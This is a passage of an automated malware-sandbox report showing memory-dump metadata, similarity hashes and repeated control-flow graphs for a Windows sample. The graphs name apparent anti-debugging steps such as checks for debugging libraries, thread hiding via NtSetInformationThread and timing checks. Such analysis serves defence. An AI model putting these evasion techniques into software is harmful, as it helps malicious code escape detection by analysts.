                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Current$BaseEnumModuleModulesName_stricmp
                                                                                                                                                                                                              • String ID: dbgcore.dll$dbghelp.dll
                                                                                                                                                                                                              • API String ID: 3352702578-4118436743
                                                                                                                                                                                                              • Opcode ID: 0a376a7893cbf69bfc92418234ae339a0ea07210be39fff49d77d34e94c064e7
                                                                                                                                                                                                              • Instruction ID: b8ca6f46a9afe43233bdda00b90d2f9f4150311fe12625bb37cc0297b5e80ba1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a376a7893cbf69bfc92418234ae339a0ea07210be39fff49d77d34e94c064e7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13215B32A28B83A1EB64AB11F4886AAF3A0FF89F84F840135DA9D47758DF3CD545D750

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 407 7ff735dd5c3d-7ff735dd5c5d 408 7ff735dd5c5f-7ff735dd5ca2 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit VirtualAlloc 407->408 409 7ff735dd5c30-7ff735dd5c3b 407->409 413 7ff735dd5ca4-7ff735dd5cba memset 408->413 414 7ff735dd5ce7-7ff735dd5d04 SetLastError GetLastError 408->414 409->407 415 7ff735dd5cc0-7ff735dd5cc4 413->415 421 7ff735dd6096-7ff735dd60b2 CreateToolhelp32Snapshot 414->421 422 7ff735dd5d0a-7ff735dd5d21 call 7ff735dd6b70 414->422 416 7ff735dd5ec6-7ff735dd5eee VirtualFree call 7ff735dd6b40 415->416 417 7ff735dd5cca-7ff735dd5cd4 415->417 431 7ff735dd5ef4-7ff735dd5efb 416->431 432 7ff735dd606f-7ff735dd6095 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 416->432 417->415 420 7ff735dd5cd6-7ff735dd5ce1 VirtualFree 417->420 420->414 423 7ff735dd615d-7ff735dd6175 GetTickCount 421->423 424 7ff735dd60b8-7ff735dd60d0 Thread32First 421->424 433 7ff735dd5e9f-7ff735dd5ec5 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 422->433 434 7ff735dd5d27-7ff735dd5d2e 422->434 430 7ff735dd6180-7ff735dd6194 423->430 428 7ff735dd6154-7ff735dd6157 CloseHandle 424->428 429 7ff735dd60d6-7ff735dd60e0 GetCurrentProcessId 424->429 428->423 435 7ff735dd6142-7ff735dd6152 Thread32Next 429->435 436 7ff735dd60e2-7ff735dd60f0 GetCurrentThreadId 429->436 430->430 437 7ff735dd6196-7ff735dd61a1 GetTickCount 430->437 438 7ff735dd5f01-7ff735dd5f36 431->438 439 7ff735dd602c-7ff735dd604f 431->439 432->421 433->416 441 7ff735dd5d34-7ff735dd5d69 434->441 442 7ff735dd5e5c-7ff735dd5e7f 434->442 435->428 435->429 436->435 443 7ff735dd60f2-7ff735dd6105 OpenThread 436->443 445 7ff735dd634d-7ff735dd6361 437->445 446 7ff735dd61a7-7ff735dd61be call 7ff735dd6ba0 437->446 447 7ff735dd5f40-7ff735dd6021 438->447 439->432 450 7ff735dd5d70-7ff735dd5e51 441->450 443->435 451 7ff735dd6107-7ff735dd6127 LoadLibraryA GetProcAddress 443->451 454 7ff735dd6613-7ff735dd662f GetProcessHeap HeapSetInformation 445->454 455 7ff735dd6367-7ff735dd637e call 7ff735dd6bc0 445->455 469 7ff735dd61c4-7ff735dd61cb 446->469 470 7ff735dd6326-7ff735dd634c call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 446->470 447->447 457 7ff735dd6027-7ff735dd602a 447->457 450->450 460 7ff735dd5e57-7ff735dd5e5a 450->460 461 7ff735dd6139-7ff735dd613c CloseHandle 451->461 462 7ff735dd6129-7ff735dd6137 NtSetInformationThread 451->462 458 7ff735dd6635-7ff735dd664c call 7ff735dd6bf0 454->458 459 7ff735dd67f6-7ff735dd6812 VirtualAlloc 454->459 476 7ff735dd6384-7ff735dd638b 455->476 477 7ff735dd65ef-7ff735dd6612 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 455->477 457->432 457->439 481 7ff735dd67cf-7ff735dd67f5 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 458->481 482 7ff735dd6652-7ff735dd6659 458->482 467 7ff735dd69bd-7ff735dd69ee call 7ff735dea920 459->467 468 7ff735dd6818-7ff735dd682f call 7ff735dd6c30 459->468 460->433 460->442 461->435 462->461 490 7ff735dd6835-7ff735dd683c 468->490 491 7ff735dd6996-7ff735dd69bc call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 468->491 472 7ff735dd61d1-7ff735dd6206 469->472 473 7ff735dd62f9-7ff735dd62fc 469->473 470->445 480 7ff735dd6210-7ff735dd62f1 472->480 484 7ff735dd6300-7ff735dd6324 473->484 485 7ff735dd65b5-7ff735dd65bb 476->485 486 7ff735dd6391-7ff735dd65af 476->486 477->454 480->480 492 7ff735dd62f7 480->492 481->459 493 7ff735dd665f-7ff735dd6698 482->493 494 7ff735dd678c-7ff735dd6796 482->494 484->470 484->484 496 7ff735dd65c0-7ff735dd65ed 485->496 486->485 497 7ff735dd6842-7ff735dd6877 490->497 498 7ff735dd6969-7ff735dd696c 490->498 491->467 492->470 500 7ff735dd66a0-7ff735dd6781 493->500 501 7ff735dd67a0-7ff735dd67cd 494->501 496->477 496->496 503 7ff735dd6880-7ff735dd6961 497->503 506 7ff735dd6970-7ff735dd6994 498->506 500->500 505 7ff735dd6787-7ff735dd678a 500->505 501->481 501->501 503->503 507 7ff735dd6967 503->507 505->481 505->494 506->491 506->506 507->491
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastV01@Virtual$??6?$basic_ostream@AllocD@std@@@std@@FreeU?$char_traits@V01@@exitmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1195510658-0
                                                                                                                                                                                                              • Opcode ID: 154ded7906f738e41a20b20b423903e3eefdf99f7c5cb5676869e4120bd489bc
                                                                                                                                                                                                              • Instruction ID: da8bfa617e06bfbccf85ba506b1022ef60fc129cfd7eaabd752162867b2d0753
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 154ded7906f738e41a20b20b423903e3eefdf99f7c5cb5676869e4120bd489bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D514826D29B8756F707A735D8812B4E390EFA3FC0F80D332E91975A91EF2DB1865210

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 508 7ff735dd583d-7ff735dd585d 509 7ff735dd585f-7ff735dd58a1 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit GetCurrentProcess OpenProcessToken 508->509 510 7ff735dd5830-7ff735dd583b 508->510 514 7ff735dd58a3-7ff735dd58c5 GetTokenInformation 509->514 515 7ff735dd58f6 call 7ff735dd4660 509->515 510->508 516 7ff735dd58eb-7ff735dd58f0 CloseHandle 514->516 517 7ff735dd58c7-7ff735dd58d1 514->517 520 7ff735dd58fb-7ff735dd58fd 515->520 516->515 517->516 519 7ff735dd58d3-7ff735dd58de 517->519 521 7ff735dd58e4-7ff735dd58e9 519->521 522 7ff735dd5ac6-7ff735dd5ad8 CloseHandle 519->522 523 7ff735dd5903-7ff735dd591a call 7ff735dd6b10 520->523 524 7ff735dd5c86-7ff735dd5ca2 VirtualAlloc 520->524 521->516 521->519 527 7ff735dd5add-7ff735dd5ae8 call 7ff735dd6ae0 522->527 536 7ff735dd5a9f-7ff735dd5ac5 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 523->536 537 7ff735dd5920-7ff735dd5927 523->537 525 7ff735dd5ca4-7ff735dd5cba memset 524->525 526 7ff735dd5ce7-7ff735dd5cf6 SetLastError GetLastError 524->526 529 7ff735dd5cc0-7ff735dd5cc4 525->529 538 7ff735dd5d02-7ff735dd5d04 526->538 534 7ff735dd5c5f-7ff735dd5c85 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 527->534 535 7ff735dd5aee-7ff735dd5af5 527->535 532 7ff735dd5ec6-7ff735dd5eee VirtualFree call 7ff735dd6b40 529->532 533 7ff735dd5cca-7ff735dd5cd4 529->533 563 7ff735dd5ef4-7ff735dd5efb 532->563 564 7ff735dd606f-7ff735dd6095 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 532->564 533->529 542 7ff735dd5cd6-7ff735dd5ce1 VirtualFree 533->542 534->524 543 7ff735dd5afb-7ff735dd5b2c 535->543 544 7ff735dd5c1c-7ff735dd5c3f 535->544 536->522 545 7ff735dd5a5c-7ff735dd5a7f 537->545 546 7ff735dd592d-7ff735dd5a5a 537->546 547 7ff735dd6096-7ff735dd60b2 CreateToolhelp32Snapshot 538->547 548 7ff735dd5d0a-7ff735dd5d21 call 7ff735dd6b70 538->548 542->526 556 7ff735dd5b30-7ff735dd5c11 543->556 544->534 546->536 546->545 551 7ff735dd615d-7ff735dd6175 GetTickCount 547->551 552 7ff735dd60b8-7ff735dd60d0 Thread32First 547->552 566 7ff735dd5e9f-7ff735dd5ec5 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 548->566 567 7ff735dd5d27-7ff735dd5d2e 548->567 562 7ff735dd6180-7ff735dd6194 551->562 560 7ff735dd6154-7ff735dd6157 CloseHandle 552->560 561 7ff735dd60d6-7ff735dd60e0 GetCurrentProcessId 552->561 556->556 565 7ff735dd5c17-7ff735dd5c1a 556->565 560->551 568 7ff735dd6142-7ff735dd6152 Thread32Next 561->568 569 7ff735dd60e2-7ff735dd60f0 GetCurrentThreadId 561->569 562->562 570 7ff735dd6196-7ff735dd61a1 GetTickCount 562->570 571 7ff735dd5f01-7ff735dd5f36 563->571 572 7ff735dd602c-7ff735dd604f 563->572 564->547 565->534 565->544 566->532 574 7ff735dd5d34-7ff735dd5d69 567->574 575 7ff735dd5e5c-7ff735dd5e7f 567->575 568->560 568->561 569->568 576 7ff735dd60f2-7ff735dd6105 OpenThread 569->576 578 7ff735dd634d-7ff735dd6361 570->578 579 7ff735dd61a7-7ff735dd61be call 7ff735dd6ba0 570->579 580 7ff735dd5f40-7ff735dd6021 571->580 572->564 583 7ff735dd5d70-7ff735dd5e51 574->583 576->568 584 7ff735dd6107-7ff735dd6127 LoadLibraryA GetProcAddress 576->584 587 7ff735dd6613-7ff735dd662f GetProcessHeap HeapSetInformation 578->587 588 7ff735dd6367-7ff735dd637e call 7ff735dd6bc0 578->588 602 7ff735dd61c4-7ff735dd61cb 579->602 603 7ff735dd6326-7ff735dd634c call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 579->603 580->580 590 7ff735dd6027-7ff735dd602a 580->590 583->583 593 7ff735dd5e57-7ff735dd5e5a 583->593 594 7ff735dd6139-7ff735dd613c CloseHandle 584->594 595 7ff735dd6129-7ff735dd6137 NtSetInformationThread 584->595 591 7ff735dd6635-7ff735dd664c call 7ff735dd6bf0 587->591 592 7ff735dd67f6-7ff735dd6812 VirtualAlloc 587->592 609 7ff735dd6384-7ff735dd638b 588->609 610 7ff735dd65ef-7ff735dd6612 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 588->610 590->564 590->572 614 7ff735dd67cf-7ff735dd67f5 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 591->614 615 7ff735dd6652-7ff735dd6659 591->615 600 7ff735dd69bd-7ff735dd69ee call 7ff735dea920 592->600 601 7ff735dd6818-7ff735dd682f call 7ff735dd6c30 592->601 593->566 593->575 594->568 595->594 623 7ff735dd6835-7ff735dd683c 601->623 624 7ff735dd6996-7ff735dd69bc call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 601->624 605 7ff735dd61d1-7ff735dd6206 602->605 606 7ff735dd62f9-7ff735dd62fc 602->606 603->578 613 7ff735dd6210-7ff735dd62f1 605->613 617 7ff735dd6300-7ff735dd6324 606->617 618 7ff735dd65b5-7ff735dd65bb 609->618 619 7ff735dd6391-7ff735dd65af 609->619 610->587 613->613 625 7ff735dd62f7 613->625 614->592 626 7ff735dd665f-7ff735dd6698 615->626 627 7ff735dd678c-7ff735dd6796 615->627 617->603 617->617 629 7ff735dd65c0-7ff735dd65ed 618->629 619->618 630 7ff735dd6842-7ff735dd6877 623->630 631 7ff735dd6969-7ff735dd696c 623->631 624->600 625->603 633 7ff735dd66a0-7ff735dd6781 626->633 634 7ff735dd67a0-7ff735dd67cd 627->634 629->610 629->629 636 7ff735dd6880-7ff735dd6961 630->636 639 7ff735dd6970-7ff735dd6994 631->639 633->633 638 7ff735dd6787-7ff735dd678a 633->638 634->614 634->634 636->636 640 7ff735dd6967 636->640 638->614 638->627 639->624 639->639 640->624
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessTokenV01@$??6?$basic_ostream@CloseCurrentD@std@@@std@@HandleInformationOpenU?$char_traits@V01@@exit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3415005937-0
                                                                                                                                                                                                              • Opcode ID: 516184fb45ba1e57938e678d562d6cb78ddd6161b742196d2db2486299c41f81
                                                                                                                                                                                                              • Instruction ID: 4feb6e0dcfa90577d1969883304a843011e93b287d512bb175866e36ef9ae1e8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 516184fb45ba1e57938e678d562d6cb78ddd6161b742196d2db2486299c41f81
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1512927D39B8356E703AB35D8811A4E790EFA3B81FC0D332E95836955EF2DE1855210

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 641 7ff735dd558c-7ff735dd5641 642 7ff735dd5560-7ff735dd5589 641->642 643 7ff735dd5647-7ff735dd564a 641->643 642->641 644 7ff735dd568f-7ff735dd56bd call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit call 7ff735dd4300 643->644 645 7ff735dd564c-7ff735dd566f 643->645 652 7ff735dd56c3-7ff735dd56da call 7ff735dd6ab0 644->652 653 7ff735dd5886-7ff735dd58a1 GetCurrentProcess OpenProcessToken 644->653 645->644 661 7ff735dd585f-7ff735dd5885 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 652->661 662 7ff735dd56e0-7ff735dd56e7 652->662 655 7ff735dd58a3-7ff735dd58c5 GetTokenInformation 653->655 656 7ff735dd58f6-7ff735dd58fd call 7ff735dd4660 653->656 658 7ff735dd58eb-7ff735dd58f0 CloseHandle 655->658 659 7ff735dd58c7-7ff735dd58d1 655->659 669 7ff735dd5903-7ff735dd591a call 7ff735dd6b10 656->669 670 7ff735dd5c86-7ff735dd5ca2 VirtualAlloc 656->670 658->656 659->658 663 7ff735dd58d3-7ff735dd58de 659->663 661->653 665 7ff735dd581c-7ff735dd583f 662->665 666 7ff735dd56ed-7ff735dd581a 662->666 667 7ff735dd58e4-7ff735dd58e9 663->667 668 7ff735dd5ac6-7ff735dd5ae8 CloseHandle call 7ff735dd6ae0 663->668 666->661 666->665 667->658 667->663 684 7ff735dd5c5f-7ff735dd5c85 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 668->684 685 7ff735dd5aee-7ff735dd5af5 668->685 686 7ff735dd5a9f-7ff735dd5ac5 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 669->686 687 7ff735dd5920-7ff735dd5927 669->687 674 7ff735dd5ca4-7ff735dd5cba memset 670->674 675 7ff735dd5ce7-7ff735dd5d04 SetLastError GetLastError 670->675 679 7ff735dd5cc0-7ff735dd5cc4 674->679 697 7ff735dd6096-7ff735dd60b2 CreateToolhelp32Snapshot 675->697 698 7ff735dd5d0a-7ff735dd5d21 call 7ff735dd6b70 675->698 682 7ff735dd5ec6-7ff735dd5eee VirtualFree call 7ff735dd6b40 679->682 683 7ff735dd5cca-7ff735dd5cd4 679->683 713 7ff735dd5ef4-7ff735dd5efb 682->713 714 7ff735dd606f-7ff735dd6095 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 682->714 683->679 692 7ff735dd5cd6-7ff735dd5ce1 VirtualFree 683->692 684->670 693 7ff735dd5afb-7ff735dd5b2c 685->693 694 7ff735dd5c1c-7ff735dd5c3f 685->694 686->668 695 7ff735dd5a5c-7ff735dd5a7f 687->695 696 7ff735dd592d-7ff735dd5a5a 687->696 692->675 706 7ff735dd5b30-7ff735dd5c11 693->706 694->684 696->686 696->695 701 7ff735dd615d-7ff735dd6175 GetTickCount 697->701 702 7ff735dd60b8-7ff735dd60d0 Thread32First 697->702 716 7ff735dd5e9f-7ff735dd5ec5 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 698->716 717 7ff735dd5d27-7ff735dd5d2e 698->717 712 7ff735dd6180-7ff735dd6194 701->712 710 7ff735dd6154-7ff735dd6157 CloseHandle 702->710 711 7ff735dd60d6-7ff735dd60e0 GetCurrentProcessId 702->711 706->706 715 7ff735dd5c17-7ff735dd5c1a 706->715 710->701 718 7ff735dd6142-7ff735dd6152 Thread32Next 711->718 719 7ff735dd60e2-7ff735dd60f0 GetCurrentThreadId 711->719 712->712 720 7ff735dd6196-7ff735dd61a1 GetTickCount 712->720 721 7ff735dd5f01-7ff735dd5f36 713->721 722 7ff735dd602c-7ff735dd604f 713->722 714->697 715->684 715->694 716->682 724 7ff735dd5d34-7ff735dd5d69 717->724 725 7ff735dd5e5c-7ff735dd5e7f 717->725 718->710 718->711 719->718 726 7ff735dd60f2-7ff735dd6105 OpenThread 719->726 728 7ff735dd634d-7ff735dd6361 720->728 729 7ff735dd61a7-7ff735dd61be call 7ff735dd6ba0 720->729 730 7ff735dd5f40-7ff735dd6021 721->730 722->714 733 7ff735dd5d70-7ff735dd5e51 724->733 726->718 734 7ff735dd6107-7ff735dd6127 LoadLibraryA GetProcAddress 726->734 737 7ff735dd6613-7ff735dd662f GetProcessHeap HeapSetInformation 728->737 738 7ff735dd6367-7ff735dd637e call 7ff735dd6bc0 728->738 752 7ff735dd61c4-7ff735dd61cb 729->752 753 7ff735dd6326-7ff735dd634c call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 729->753 730->730 740 7ff735dd6027-7ff735dd602a 730->740 733->733 743 7ff735dd5e57-7ff735dd5e5a 733->743 744 7ff735dd6139-7ff735dd613c CloseHandle 734->744 745 7ff735dd6129-7ff735dd6137 NtSetInformationThread 734->745 741 7ff735dd6635-7ff735dd664c call 7ff735dd6bf0 737->741 742 7ff735dd67f6-7ff735dd6812 VirtualAlloc 737->742 759 7ff735dd6384-7ff735dd638b 738->759 760 7ff735dd65ef-7ff735dd6612 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 738->760 740->714 740->722 764 7ff735dd67cf-7ff735dd67f5 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 741->764 765 7ff735dd6652-7ff735dd6659 741->765 750 7ff735dd69bd-7ff735dd69ee call 7ff735dea920 742->750 751 7ff735dd6818-7ff735dd682f call 7ff735dd6c30 742->751 743->716 743->725 744->718 745->744 773 7ff735dd6835-7ff735dd683c 751->773 774 7ff735dd6996-7ff735dd69bc call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 751->774 755 7ff735dd61d1-7ff735dd6206 752->755 756 7ff735dd62f9-7ff735dd62fc 752->756 753->728 763 7ff735dd6210-7ff735dd62f1 755->763 767 7ff735dd6300-7ff735dd6324 756->767 768 7ff735dd65b5-7ff735dd65bb 759->768 769 7ff735dd6391-7ff735dd65af 759->769 760->737 763->763 775 7ff735dd62f7 763->775 764->742 776 7ff735dd665f-7ff735dd6698 765->776 777 7ff735dd678c-7ff735dd6796 765->777 767->753 767->767 779 7ff735dd65c0-7ff735dd65ed 768->779 769->768 780 7ff735dd6842-7ff735dd6877 773->780 781 7ff735dd6969-7ff735dd696c 773->781 774->750 775->753 783 7ff735dd66a0-7ff735dd6781 776->783 784 7ff735dd67a0-7ff735dd67cd 777->784 779->760 779->779 786 7ff735dd6880-7ff735dd6961 780->786 789 7ff735dd6970-7ff735dd6994 781->789 783->783 788 7ff735dd6787-7ff735dd678a 783->788 784->764 784->784 786->786 790 7ff735dd6967 786->790 788->764 788->777 789->774 789->789 790->774
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $!
                                                                                                                                                                                                              • API String ID: 0-2056089098
                                                                                                                                                                                                              • Opcode ID: 73c69bf2605b0504c12c3e7402fb25c37ed305435cad5dacd0e605a5dfae49a0
                                                                                                                                                                                                              • Instruction ID: eab9778112a27c1ad75539270b85ad34bf5cbe7f34e38910e26093fd5f048c4b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73c69bf2605b0504c12c3e7402fb25c37ed305435cad5dacd0e605a5dfae49a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F461F96BC3AB935AF703A635D8420A4E654AFB7AC4B91D333FD2435952FF19B1C25104

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 791 7ff735dd566d-7ff735dd568d 792 7ff735dd568f-7ff735dd56bd call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit call 7ff735dd4300 791->792 793 7ff735dd5660-7ff735dd566b 791->793 799 7ff735dd56c3-7ff735dd56da call 7ff735dd6ab0 792->799 800 7ff735dd5886-7ff735dd58a1 GetCurrentProcess OpenProcessToken 792->800 793->791 808 7ff735dd585f-7ff735dd5885 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 799->808 809 7ff735dd56e0-7ff735dd56e7 799->809 802 7ff735dd58a3-7ff735dd58c5 GetTokenInformation 800->802 803 7ff735dd58f6-7ff735dd58fd call 7ff735dd4660 800->803 805 7ff735dd58eb-7ff735dd58f0 CloseHandle 802->805 806 7ff735dd58c7-7ff735dd58d1 802->806 816 7ff735dd5903-7ff735dd591a call 7ff735dd6b10 803->816 817 7ff735dd5c86-7ff735dd5ca2 VirtualAlloc 803->817 805->803 806->805 810 7ff735dd58d3-7ff735dd58de 806->810 808->800 812 7ff735dd581c-7ff735dd583f 809->812 813 7ff735dd56ed-7ff735dd581a 809->813 814 7ff735dd58e4-7ff735dd58e9 810->814 815 7ff735dd5ac6-7ff735dd5ae8 CloseHandle call 7ff735dd6ae0 810->815 813->808 813->812 814->805 814->810 831 7ff735dd5c5f-7ff735dd5c85 call 7ff735de8990 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z exit 815->831 832 